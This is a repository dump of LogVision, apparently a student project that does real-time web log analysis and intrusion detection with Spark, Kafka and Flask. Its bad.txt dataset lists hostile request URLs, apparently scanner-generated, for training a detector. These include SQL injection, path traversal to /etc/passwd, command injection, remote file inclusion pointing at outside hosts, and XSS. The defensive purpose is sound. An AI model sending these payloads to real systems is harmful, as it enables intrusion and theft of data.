Repository: xander-wang/logvision
Branch: master
Commit: 93b1eaae6c5a
Files: 75
Total size: 70.1 MB
Directory structure:
gitextract_jksm79cg/
├── .gitignore
├── README.md
├── datasets/
│ ├── access_log
│ └── learning-datasets/
│ ├── testing/
│ │ ├── bad.txt
│ │ └── good.txt
│ └── training/
│ ├── bad.txt
│ └── good.txt
├── flask/
│ ├── app.py
│ ├── requirements.txt
│ ├── static/
│ │ ├── css/
│ │ │ └── styles.css
│ │ └── js/
│ │ └── echarts/
│ │ ├── echarts.js
│ │ ├── extension/
│ │ │ ├── bmap.js
│ │ │ └── dataTool.js
│ │ └── map/
│ │ └── js/
│ │ ├── china.js
│ │ └── world.js
│ └── templates/
│ ├── about.html
│ ├── analysis.html
│ ├── id.html
│ └── index.html
├── flume/
│ └── standalone.conf
├── log_gen/
│ └── log_gen.java
└── spark/
├── build.sbt
├── project/
│ ├── assembly.sbt
│ ├── build.properties
│ ├── project/
│ │ └── target/
│ │ └── config-classes/
│ │ └── $43a0538f7780cac449ae.cache
│ └── target/
│ ├── config-classes/
│ │ ├── $16828faecf688d54d497.cache
│ │ ├── $30003e6e888c6501d0a9.cache
│ │ ├── $3d85af9b26c1a259b49e.cache
│ │ ├── $46bc225346f5c722f39f.cache
│ │ ├── $da50ce791668c9ed0f15.cache
│ │ └── $f2cabef45cb06cd331f1.cache
│ ├── scala-2.12/
│ │ └── sbt-1.0/
│ │ └── update/
│ │ └── update_cache_2.12/
│ │ ├── inputs
│ │ └── output
│ └── streams/
│ ├── _global/
│ │ ├── _global/
│ │ │ ├── _global/
│ │ │ │ └── streams/
│ │ │ │ └── out
│ │ │ └── csrLogger/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── out
│ │ ├── csrConfiguration/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── out
│ │ ├── csrProject/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── out
│ │ ├── dependencyPositions/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── update_cache_2.12/
│ │ │ ├── input_dsp
│ │ │ └── output_dsp
│ │ ├── ivyConfiguration/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── out
│ │ ├── ivySbt/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── out
│ │ ├── moduleSettings/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── out
│ │ ├── projectDescriptors/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── out
│ │ ├── scalaCompilerBridgeScope/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── out
│ │ └── update/
│ │ └── _global/
│ │ └── streams/
│ │ └── out
│ ├── compile/
│ │ ├── _global/
│ │ │ └── _global/
│ │ │ ├── compileBinaryFileInputs/
│ │ │ │ └── previous
│ │ │ ├── compileOutputs/
│ │ │ │ └── previous
│ │ │ ├── compileSourceFileInputs/
│ │ │ │ └── previous
│ │ │ ├── dependencyClasspathFiles/
│ │ │ │ └── previous
│ │ │ ├── discoveredMainClasses/
│ │ │ │ └── data
│ │ │ └── managedSourcePaths/
│ │ │ └── previous
│ │ ├── compile/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── out
│ │ ├── compileIncremental/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ ├── export
│ │ │ └── out
│ │ ├── copyResources/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ ├── copy-resources
│ │ │ └── out
│ │ ├── dependencyClasspath/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── export
│ │ ├── exportedProducts/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── export
│ │ ├── externalDependencyClasspath/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── export
│ │ ├── internalDependencyClasspath/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── export
│ │ ├── managedClasspath/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── export
│ │ ├── unmanagedClasspath/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── export
│ │ └── unmanagedJars/
│ │ └── _global/
│ │ └── streams/
│ │ └── export
│ └── runtime/
│ ├── dependencyClasspath/
│ │ └── _global/
│ │ └── streams/
│ │ └── export
│ ├── exportedProducts/
│ │ └── _global/
│ │ └── streams/
│ │ └── export
│ ├── externalDependencyClasspath/
│ │ └── _global/
│ │ └── streams/
│ │ └── export
│ ├── fullClasspath/
│ │ └── _global/
│ │ └── streams/
│ │ └── export
│ ├── internalDependencyClasspath/
│ │ └── _global/
│ │ └── streams/
│ │ └── export
│ ├── managedClasspath/
│ │ └── _global/
│ │ └── streams/
│ │ └── export
│ ├── unmanagedClasspath/
│ │ └── _global/
│ │ └── streams/
│ │ └── export
│ └── unmanagedJars/
│ └── _global/
│ └── streams/
│ └── export
├── src/
│ └── main/
│ └── scala/
│ ├── learning.scala
│ └── streaming.scala
└── target/
└── streams/
└── _global/
└── _global/
└── checkBuildSources/
└── _global/
├── inputFileStamps/
│ └── previous
└── streams/
└── out
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitignore
================================================
# Python
__pycache__/
*.py[cod]
*$py.class
*.so
.Python
build/
develop-eggs/
dist/
downloads/
eggs/
.eggs/
lib/
lib64/
parts/
sdist/
var/
wheels/
*.egg-info/
.installed.cfg
*.egg
MANIFEST
.pytest_cache/
# Vue/Node
node_modules/
npm-debug.log*
yarn-debug.log*
yarn-error.log*
.DS_Store
dist/
.env
.env.local
.env.*.local
*.log
logs/
# IDE
.idea/
.vscode/
*.suo
*.ntvs*
*.njsproj
*.sln
*.sw?
# 系统文件
Thumbs.db
ehthumbs.db
Desktop.ini
================================================
FILE: README.md
================================================
# LogVision / 使用大数据的分布式实时日志分析与入侵检测系统
[开发文档](https://xander-wang.github.io/2020/05/09/logvision/)
## 版本记录(当前2.0)
- 2018.12.8 v1.0:原型版本,有bug。
- 2020.5.9 v2.0:初步完善版本,可以实现预期效果。
## 问题交流
- Telegram群组:https://t.me/logv123
## 简介
LogVision是一个整合了web日志聚合、分发、实时分析、入侵检测、数据存储与可视化的日志分析解决方案。聚合采用Apache Flume,分发采用Apache Kafka,实时处理采用Spark Streaming,入侵检测采用Spark MLlib,数据存储使用HDFS与Redis,可视化采用Flask、SocketIO、Echarts、Bootstrap。
本文下述的使用方法均面向单机伪分布式环境,你可以根据需求进行配置上的调整以适应分布式部署。
本系统各模块由个人独立开发,期间参考了一些有价值的文献与资料。本系统还是个人的本科毕业设计。
获得的奖项:2019年全国大学生计算机设计大赛安徽省二等奖、2019年安徽省信息安全作品赛二等奖。
[原型版本的介绍视频](https://www.bilibili.com/video/BV1eb411T77r)
## 系统架构

## 数据流向
(数字代表处理步骤)

## 入侵检测流程

## 项目结构
- flask:Flask Web后端
- spark:日志分析与入侵检测的实现
- flume:Flume配置文件
- log_gen:模拟日志生成器
- datasets:测试日志数据集
- images:README的图片
## 依赖与版本
- 编译与Web端需要用到的:
- Java 8, Scala 2.11.12, Python 3.8 (包依赖见requirements), sbt 1.3.8
- 计算环境中需要用到的:
- Java 8, Apache Flume 1.9.0, Kafka 2.4, Spark 2.4.5, ZooKeeper 3.5.7, Hadoop 2.9.2, Redis 5.0.8
## 使用说明
在开始之前,你需要修改源码或配置文件中的IP为你自己的地址。具体涉及到flume配置文件、Spark主程序、Flask Web后端。
### 编译Spark应用
在安装好Java8与Scala11的前提下,在```spark```目录下,初始化```sbt```:
```
sbt
```
退出```sbt shell```并使用```sbt-assembly```对Spark项目进行编译打包:
```
sbt assembly
```
然后将生成的```jar```包重命名为```logvision.jar```。
### 环境准备
你需要一个伪分布式环境(测试环境为CentOS 7),并完成了所有对应版本组件依赖的配置与运行。
使用```flume```目录下的```standalone.conf```启动一个Flume Agent。
将```datasets```文件夹中的```learning-datasets```提交如下路径:
```
/home/logv/learning-datasets
```
将```datasets```文件夹中的```access_log```提交如下路径:
```
/home/logv/access_log
```
### 入侵检测模型训练与测试
提交```jar```包至Spark集群并执行入侵检测模型的生成与测试:
```
spark-submit --class learning logvision.jar
```
你将可以看到如下结果:

两个表格分别代表正常与异常数据集的入侵检测结果,下面四个表格可用于判断识别准确率。如图中所示250条正常测试数据被检测为250条正常,识别率100%;250条异常测试数据被检测为240条异常,10条正常,准确率96%。
### 启动可视化后端
在```flask```目录下执行如下命令,下载依赖包:
```
pip3 install -r requirements.txt
```
启动Flask Web:
```
python3 app.py
```
### 启动实时日志生成器
```log_gen```中的实时日志生成器可根据传入参数(每次写入行数、写入间隔时间)将样本日志中的特定行块追加至目标日志中,以模拟实时日志的生成过程,供后续实时处理。
```
java log_gen [日志源] [目标文件] [每次追加的行数] [时间间隔(秒)]
```
提交至环境,编译并运行,每2秒将```/home/logv/access_log```文件中的5行追加至```/home/logSrc```中:
```
javac log_gen.java
java log_gen /home/logv/access_log /home/logSrc 5 2
```
### 启动分析任务
提交```jar```包至Spark集群并执行实时分析任务:
```
spark-submit --class streaming logvision.jar
```
### 查看可视化结果
至此你已经完成了后端组件的配置,通过浏览器访问Web端主机的```5000```端口可以查看到实时日志分析的可视化结果:
欢迎界面:

实时日志分析界面:

实时入侵检测界面:

================================================
FILE: datasets/access_log
================================================
[File too large to display: 40.3 MB]
================================================
FILE: datasets/learning-datasets/testing/bad.txt
================================================
alert(1)//0
/javascript/sl.exe
/examples/jsp/jsp2/jspx/sysinfo.cgi?action=systemdoc&name=sysinfo_name_cmd_exec.nasl;id
/javascript/.web.exe
/zln2hm2z.htm?
/ju0u7kfo.php3?
/bmeun223.pl?
/ht8pn8uq.dll?
/help.php?q='\x0adel\x09q79344163\x09#
/help.php?q="ping;-w;10000;-n;1;1.2.3.4|rem;
/.../.../.../.../.../.../.../.../.../windows/win.ini
/examples/servlets/servlet/starnet/addons/slideshow_full.php?album_name='1978429620
/vac1l5vm.php3?
/javascript/presentations.exe
/help.php?q="rm q92991511 #
/xsqln7eb.php3?
/script/ident/loginliste.php?path_inc=http://192.168.202.96:8080/4dckqcc0acprbz?
/33y9gcqq.x?
/en-us/account/index.php?op=default&date=200607' union select 1,674790948,1,1,1,1,1,1,1,1--&blogid=1
/javascript/monitor.exe
/scripts/h3d1n9eaqxv3.html
/examples/jsp/jsp2/jspx/kernel/loadkernel.php?installpath=/etc/passwd\x00
/xssxmltest/
/help.php?q="&uname #
/dslpwt15.php3?
/examples/servlets/servlet/al_initialize.php?alpath=/etc/passwd\x00
/ao22ww7y.php3?
/cacti/index.php?sensor_program=
/7o5qp766.cfm?
/main.php?logout="ver\xa0>q32937989&rem\xa0
/scripts/icat
/6wb70v0b.html?
/5qnlm5z2.jspa?
/javascript/hipaa.exe
/manager/faq.php?action=&type=view&s=&id=-1' union select 0,348320449,0,0,0,0,0--
/if69ddo1.mscgi?
/scripts/faxsurvey?cat /etc/passwd
/javascript/filez.exe
/script_path/config.inc.php?_path=http://192.168.202.96:8080/4dckqcc0acprbz??
/en-us/account/index.pl/homels?func=add;class=webgui::asset::wobject::article;print `id`;
/scripts/file.php?path=/etc/passwd\x00
/6wb70v0b.mscgi?
/iktok2bw.php3?
/en-us/jnv890lt.cfc?
/cgi-bin/index.php?search='>&searchmode=f
/r3le3om5.cfm?
/main.php?logout=';rm\x09q16263765\x09#
/recordings/mmstdod.cgi?alternate_templates=| echo "content-type: text/html";echo "" ; id\x00
/main.php?stuff="\x0arm\x09q48139983\x09#
/nigdyniewieszcomo\xbfeszzyska\xe6atakwieledostraceniajest:(/
/scripts/bveygnpo6hkw.pl
/j4drbkil.fts?
/javascript/gump.exe
/.nsf
/main.php?logout=;del\x09q38215685\x09#
/
/en-us/fo564rei.x?
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+8b+ec+50+60+6a+04+5a+50+8b+dc+e8+41+00+00+00+6a+00+68+6c+6c+6f+63+68+75+61++>>ctdn
/
/javascript/definition.exe
/nyvbv05h.x?
/en-us/account/claroline/resourcelinker/resourcelinker.inc.php?clarolinerepositorysys=/etc/passwd\x00
/help.php?q='\x0adel q19373947 #
/javascript/rhtml.exe
/t7tm4m0b.dll?
/cacti/base_local_rules.php?dir=
/roads/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd\x00
/javascript/document.gz
/addvip.php?msetstr["progsdir"]=http://192.168.202.96:8080/txenjrxf3?
/javascript/assets.exe
/fo564rei.mscgi?
/cgi-bin/index.php?id='union/**/select/**/0,0,763560836,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
/zmvq66jy.nsf?
/javascript/space.exe
/edzaia0i.dll?
/examples/jsp/num/index.php?site=../../../../../../../../etc/passwd\x00
/jw64yq8u.cfm?
/cgi-bin/admin/general.php?mode=perlinfo&config[general][perl_binary]=cat /etc/passwd||
/examples/jsp/error/ncbook.cgi?action=default¤t=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
/iktok2bw.pl?
/eei78ore.x?
/phpmyadmin/documentation.html?phpmyadmin=&cat /etc/passwd&
/....\....\....\....\....\....\....\....\....\windows\win.ini
/mpcgi/sensepost.exe?/c+dir
/cgi-bin/visitor.exe
/scripts/rx9ysf2iwv4j.pl
/7u1pb2xi.htm?
/scripts/blog/mt-check.cgi
/scripts/zq9frlz6fcfp.php3
/cgi-bin/index.php?act=arcade&do=stats&gameid=1'
/cgi-bin/libraries/adodb/server.php?sql='adodb_sql_sql_injection.nasl
/bemarket/shop/index.php?pageurl=viewpage&filename=../../../../../../../../../../../../../../etc/passwd
/phpmyadmin/includes/converter.inc.php?include_path=/etc/passwd\x00
/scripts/cal_event.php?id=1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13--
/scripts/2sfdqydfaknx.pl
/help.php?q="&rm;q83399542&rem;
/scripts/bpk_bsfe_4vq.sh
/8t9v8k7x.nsf?
//..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/pma/db_details_importdocsql.php?submit_show=true&do=import&docpath=../
/t7tm4m0b.fts?
/weq93ppb.htm?
/scripts/www/delivery/fc.php?max_type=../../../../../../../../../../etc/passwd\x00
/javascript/devel.exe
/login/sm_login_screen.php?uid=\">
/cgi-sys/c32web.exe/changeadminpassword
/cgis/ion-p?page=../../../../../etc/passwd
/en-us/i686v90l.cgi?
/javascript/maps.exe
/recordingsmultihtml.pl?multi=/etc/passwd\x00html
/index.php?config["sipssys"]=http://192.168.202.118:8080/ghl9il?
/g8nu2yy7.html?
/jnt3f86c.php?
/examples/jsp/sessions/search.cgi?..\..\..\..\..\..\winnt\win.ini
/en-us/account/review.php?id=1&cat=&subcat=">
/a.jsp/
/script//ident/index.php?path_inc=http://192.168.202.118:8080/ghl9il?
/33y9gcqq.idc?
/main.php?stuff="\x0auname >q72652917 #
/comments.php?scriptpath=http://192.168.202.118:8080/moclyxlwqyfjnp??
/javascript/.passwd.orig
/v3axg1p8.dll?
/subscriptions.orig
/1r8cfrlf.asp?
/5o9zq43e.jspa?
/scripts/mail.php?id='/**/union/**/select/**/1,2,1331909424,4--&blog=1
/examples/jsp/num/cal_event.php?id=1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13--
/examples/jsp/num/backend/classes.php?include_path=../lib/jinzora.js\x00
/h4bi26jd.x?
/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../vtigerservice.php\x00
/pbserver/..\xc0%9v..\xc0%9v..\xc0%9v..\xc0%9v..\xc0%9v../winnt/system32/cmd.exe?/c+dir+c:\+/og
/cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904220&lang_crm=../../../../../../../../../../../..//etc/passwd\x00
/?
/fc9t54l7.cgi?
/3hlysl2x.fts?
/qczkquis.pl?
/static//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/scripts/check-lom.php?etcdir=http://192.168.202.118:8080/zz5thkvtmlgl?
/examples/servlets/servlet/inc/functions.inc.php?config[ppa_root_path]=/etc/passwd\x00
/index.php?entry='
/scripts/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1332008332,1,1,1,1,1,1,1--&blogid=1
/comments.php?scriptpath=http://192.168.202.96:8080/no4ghqiguzhst??
/fmnveedu.jspa?
/script/template/index.php?main_page_directory=http://192.168.202.96:8080/4dckqcc0acprbz?
/mysubscription/
/examples/servlets/servlet/lib/owl_api.php?xrms_file_root=../../../../../../../../../../../../etc/passwd\x00
/scripts/buoalakxhatu.cgi
/tuwjta1w.kspx?
/phpmyadmin/menu_dx.php?site_path=../../../../../../../../../../etc/passwd\x00
/r3le3om5.kspx?
/javascript/title.exe
/ju0u7kfo.jspa?
/scripts/t769qwej0llr.php
/hipkz026.php3?
/default.php?error_message=
/scripts/nffhikq061nq.php
/top.php?stuff="rm;q48162266&rem;
/ows-bin/.passwd
/6dlc2zm9.asp?
/javascript/.htpasswd.sfish
/javascript/en.exe
/examples/jsp/num/ion-p.exe?page=c:\\winnt\\win.ini
/en-us/account/a1disp3.cgi?/../../../../../../etc/passwd
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+33+c9+51+52+53+ff+75+00+ff+54+05+04+85+c0+7e+01+c3+68+61+64+00+00+68+54+68++>>esbq
/top.php?stuff="ping,-w,7000,-n,1,4.3.2.1|rem,
/1qwv2p5p.php?
/javascript/error-log.exe
/scripts/index.php?action=login&languages[nessus]=syscp_1211.nasl&language=nessus&langs[nessus][0][file]=/etc/passwd
/javascript/document.bin
/zuihld5m.php?
/phpmyadmin/index.php?entry='
/examples/jsp/sessions/contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd\x00
/m2fpztty.php3?
/bmeun223.kspx?
/main.php?stuff=ping;-w;7000;-n;1;1.2.3.4&rem;
/scripts/htsearch.cgi
/gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd
/scriptcon/
/m2fpztty.dll?
/phpmyadmin/sql.php?server=000&cfgservers[000][host]=hello&btndrop=no&goto=/etc/passwd
/ao22ww7y.html?
/examples/jsp/jsp2/jspx/backend/classes.php?include_path=../lib/jinzora.js\x00
/d765w06j.do?
/fastscripts2/
/j4drbkil.exe?
/ikonboard.cgi?act=st&f=1&t=1&hl=nessus&st='
/admin/htmlarea/popups/file/files.php?q=&mode=apparel
/bl8sefdm.cgi?
/javascript/mlist.exe
/scripts/samples/search/filetime.idq
/hjdzm96v.dll?
/javascript/index1.exe
/javascript/low.exe
/lsoix5h3.cfm?
/jackrabbit/search.jsp?q=%"
/help.php?q="&del,q66241785&rem,
/8t9v8k7x.php?
/scripts/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331923197',null,null,null,null --
/cgi-sys/msmmask.exe?mask=/junk334
/fpnpp5zg.fts?
/phpmyadmin/index2.cgi?frames=yes&board=demo&mode=current&threads=collapse&message=../../../../../../../../../../etc/passwd\x00
/9o6g5vkn.exe?
/y8pmygrp.cgi?
/
/javascript/fuckoff.exe
/opensiteadmin/scripts/classes/formmanager.php?path=http://192.168.202.96:8080/vir0v3xfc?\x00
/g8nu2yy7.dll?
/javascript/sws.exe
/javascript/console.exe
/nyvbv05h.mscgi?
/quickstore.cgi?nessus&template=../../../../../../../../../../etc/passwd\x00html
/javascript/updater.exe
/examples/jsp/num/include/monitoring/engine/makexml.php?fileoreonconf=/etc/passwd\x00
/scp.dll/sendto?template=../../../../../../../../../../../../boot.ini\x00gwextranet_template_dir_traversal.nasl
/manager/wordtrans.php?command=show_desc&advanced=1";id; true "
/flash-xss/
/scripts/index.php?board=nonexistant1452986522
/8x6w469u.asp?
/examples/jsp/jsp2/el/al_initialize.php?alpath=/etc/passwd\x00
/l13b77e5.kspx?
/help.php?q="rm q63986192&rem
/script/_conf/core/common-tpl-vars.php?confdir=@rfiurl?confdir=@rfiurl?
/phpmyadmin/index.php?gadget=glossary&action=view&term=
/main.php?logout="del\x0cq94269861&rem\x0c
/cacti/texis.exe/nessus
/javascript/.htpasswd.sfish/-2147483649
/databasesubscriptionsthumb/
/javascript/hour.exe
/cgibin/fileseek.cgi?foot=&head=;cat /etc/passwd|
/albums/userpics/copperminer.jpg.php?cat /etc/passwd
/en-us/account/include/theme.inc.php?fullpath=/etc/passwd\x00
/ju0u7kfo.html?
/cgi-sys/fileseek2.cgi?foot=&head=;cat /etc/passwd|
/javascript/broker.exe
/examples/jsp/num/coin_includes/constants.php?_ccfg[_pkg_path_incl]=/etc/passwd\x00
/examples/jsp/jsp2/el/admin.php?style=../../../../../../../../../../../../etc/passwd\x00
/examples/jsp/jsp2/jspx/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor
/x7pclv4s.nsf?
/main.php?logout='\x0dsleep\x0910\x09#
/cabela's african safari/
/examples/servlets/servlet/auktion.cgi?menue=../../../../../../../../../etc/passwd
/scripts/upgrade/index.php?steporder[]=../../../../../../../../../../../../etc/passwd\x00
/nmw0do67.php3?
/scripts/d3z7yywpyeoa.asp
/kernel/loadkernel.php?installpath=/etc/passwd\x00
/v3axg1p8.jspa?
/mod_membre/inscription.php?chemin=http://192.168.202.118:8080/moclyxlwqyfjnp??
/5qnlm5z2.aspx?
/en-us/w4996nr0.mscgi?
/examples/jsp/checkbox/forum_2.php?msg=10&return=
/ridin'high/
/?
/examples/jsp/checkbox/core/editor.php?editor_insert_bottom=/etc/passwd
/help.php?q="&ping\xa0-w\xa08000\xa0-n\xa01\xa04.3.2.1&rem\xa0
/help.php?q="|ping\x09-w\x0910000\x09-n\x091\x091.2.3.4|rem\x09
/search.cgi?qt="&search.x=0&search.y=0
/cgi-local/windmail.exe? -n c:\boot.ini hacker@hax0r.com | dir c:\\
/main.php?stuff="ping\x0b-w\x0b9000\x0b-n\x0b1\x0b1.2.3.4&rem\x0b
/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332009302&lang_crm=../../vtigerservice.php\x00
/javascript/.htaccess.sfish/\'\"
/base_local_rules.php?dir=
/o35zot2r.kspx?
/mod_membre/inscription.php?chemin=http://cirt.net/rfiinc.txt??
/i2n4v4rl.cfc?
/examples/servlets/servlet/index.php?include_files[]=&include_files[query_string]=/etc/passwd
/main.php?stuff="rm\x09q12267523&rem\x09
/examples/jsp/error/news.php?prevnext=1'phpnews_prevnext_sql_injection.nasl
/fc9t54l7.cfm?
/cacti/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331909220&lang_crm=../../../../../../../../../../../..//etc/passwd\x00
/cgi-bin/index2.php?_server[]=&_server[remote_addr]='.system('id').exit().'&option=wrapper&module[module]=1
/msvcrt.exe/
/scripts/nffhikq061nq.asp
/miz4r5hz.cfc?
/tamambolo_scriptprocdump/
/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.23.202/top.php%3fstuff%3d2040844887&frm_user=q23487867&scr_height=&scr_width=
/igtf0zon.fts?
/ybz5rz7a.x?
/javascript/certified.exe
/examples/servlets/servlet/user.cgi?url=">&from=add
/scripts/index.php?page=/etc/passwd\x00
/33y9gcqq.htm?
/opensiteadmin/scripts/classes/formmanager.php?path=http://192.168.202.96:8080/no4ghqiguzhst?\x00
/scripting guide/
/phpmyadmin/search=
/subscriptions.jsf
/miz4r5hz.x?
/jdx255ea.jspa?
/main.php?logout=1:"ls"
/q703m78q.asp?
/cgi-perl/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd
/scs86g1p.pl?
/u95h6ymu.pl?
/javascript/cgi-shl.exe
/top.php?stuff='&uname\x09>q47253924\x09#
/3j8echh0.cfc?
/javascript/exec.exe
/javascript/htpasswd.png
/j734qobz.html?
/o1zj4u9v.pl?
/cacti/k/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor
/0u75ldxq.idc?
/examples/jsp/jsp2/jspx/file.cgi?name=/eventcache/../../../../../../../../../../../boot.ini
/1qwv2p5p.kspx?
/manager/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331904435
/rpxyx07v.idc?
/cgi-bin/index.php?template=../../../loudblog/custom/config.php\x00
/j2kdmfw4.mscgi?
/help.php?q=;rm q13157688 #
/main.php?stuff="ping,-w,7000,-n,1,4.3.2.1&rem,
/0qhcnefz.fts?
/cgi-bin/viewcvs.cgi/?cvsroot=
/scripts/index.php?album=../../../../../../../../../../boot.ini\x00
/h4bi26jd.exe?
/0w155a7c.php?
/main.php?stuff="&del,q13326619&rem,
/fcgi-bin/r.cgi?file=../../../../../../../../../../etc/passwd
//..\..\..\..\..\..\..\..\windows/win.ini
/scriptguide/
/javascript/document.temp
/top.php?stuff='uname\x09>q54162214\x09#
/javascript/big.exe
/d765w06j.do?
/script/ident/loginmodif.php?path_inc=http://192.168.202.118:8080/moclyxlwqyfjnp?
/manager/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904457','5'--
/recordings/al_initialize.php?alpath=/etc/passwd\x00
/jnv890lt.cgi?
/cgi-914/texis.exe/junk
/main.php?logout='\x0ddel q95689814 #
/\x0a\x0a.jsp
/phpmyadmin/sgdynamo.exe?htname=sgdynamo.exe
/main.php?logout=&ver,>q27276952&rem,
/scripts/includes/db_adodb.php?basedir=/etc/passwd\x00
/scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331919200,0x3a,512612977),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
/script//ident/index.php?path_inc=@rfiurl
/help.php?q="ping -w 9000 -n 1 4.3.2.1&rem
/help.php?q=&uname >q88293785 #
/cgi-bin/faq.php?action=&type=view&s=&id=-1' union select 0,929714876,0,0,0,0,0--
/top.php?stuff="\x0duname >q44371957 #
/awstats/awstats.pl?migrate=|echo;echo x;echo|awstats340378.txt
/en-us/9kr0ih0v.exe?
/javascript/htpasswd.html
/u8yiqilu.aspx?
/templates/tmpl_dfl/scripts/index.php?dir[inc]=http://192.168.202.118:8080/ghl9il?
/addvip.php?msetstr["progsdir"]=http://192.168.202.118:8080/tzhfyzkbomspvm?
/script/plugins/phpgacl/admin/index.php?path_inc=http://192.168.202.96:8080/4dckqcc0acprbz?
/top.php?stuff="&ver >q91375949&rem
/scripts/tomcat_proxy_directory_traversal.nasl1332008334
/help.php?q="ping\x0b-w\x0b7000\x0b-n\x0b1\x0b1.2.3.4|rem\x0b
/javascript/letters.exe
/javascript/paid.exe
/examples/jsp/checkbox/login.php?lang=/../../../../../../../../../../../../etc/passwd\x00.txt
/recordings/index.php?entry='
/vac1l5vm.do?
/82q7ywa8.aspx?
/ff_noscript/
/help.php?q=";del\x09q65733963\x09#
/javascript/yearly.exe
/javascript/opt.exe
/examples/jsp/sessions/btdownload.php?type=torrent&file=../../../../../../../../../../etc/passwd
/static//..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c/windows/win.ini
/contribute.cgi?template=/etc/passwd&contribdir=.&plugin=alkalay_cmd_exec.nasl
/javascript/shtml.exe
/examples/jsp/checkbox/popup.php?include_path=/etc/passwd\x00
/33y9gcqq.fts?
/javascript/makefile.exe
/6dlc2zm9.dll?
/examples/jsp/error/listrec.pl?app=qmh-news&template=;ls /etc|
/scripts/printenv.pl
/eei78ore.idc?
/examples/jsp/jsp2/jspx/index.php?search='>&searchmode=f
/scripting tools/
/htbin/fileseek2.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=
/9o6g5vkn.html?
/i686v90l.exe?
/examples/jsp/num/home/search.asp?nchannel='1
/scripts/info.dat
/tuwjta1w.htm?
/scripts/ohelp/en_us/content/master/webadmin/webadmin.html
/examples/jsp/cal/check_user_id.php?user_id=
/main.php?stuff="ver;>q74579968&rem;
/cgi-home/htimage.exe/path/filename?2,2
/index.php?op=default&date=200607' union select 1,1425852379,1,1,1,1,1,1,1,1--&blogid=1
/it's_cad-tastic!/
/javascript/htpasswd.csv
/j4oqyvga.htm?
/shop/normal_html.cgi?file=|cat /etc/passwd|
/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1332010395',null,null,null,null --
/en-us/dda2qr7j.cfm?
/hipkz026.cfm?
/qb2xy9aw.cfc?
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+a+fa+>>ctdn
/rbec2ohx.dll?
/subscriptions.pfx
/en-us/fo564rei.html?
/j4rdyhw8.html?
/bn857frh.dll?
/nyjgaorz.jspa?
/mod_membre/inscription.php?chemin=@rfiurl?chemin=@rfiurl?
/conscripted_gifts/
/cgi-win/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd
/[seccheck]/..%2f..%2f../ext.ini
/ybz5rz7a.idc?
/cacti/index.php?act=arcade&do=stats&gameid=1'
/scripts/zq9frlz6fcfp.pl
/scripts/tools/dsnform.exe
/bxnyrhmh.cfm?
/d7ktpmcq.mscgi?
/7u1pb2xi.idc?
/cgi-win/sensepost.exe?/c+dir
/scripts/force-download.php
/admin/common/script.js.php.copy
/scripts/nckowqpd4zng.sh
/javascript/reprints.exe
/forum-ra.asp?n=/etc/passwd
/javascript/track.exe
/recordings/starnet/addons/slideshow_full.php?album_name='1334444193
/m5103snj.idc?
/examples/jsp/cal/index.php?gadget=glossary&action=viewterm&term=
/javascript/cpadmin.exe
/main.php?logout=';del\x09q16263765\x09#
/scripts/include/theme.inc.php?fullpath=/etc/passwd\x00
/phpmyadmin/documentation.html?phpmyadmin=map47fckapd3c2j9d7svslcjakhdm1fs' and sleep(4)='
/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.28.202/&frm_user=&scr_height=&scr_width=q27812776
/cgi-bin/awstatstotals.php?sort="].phpinfo().exit().$a["
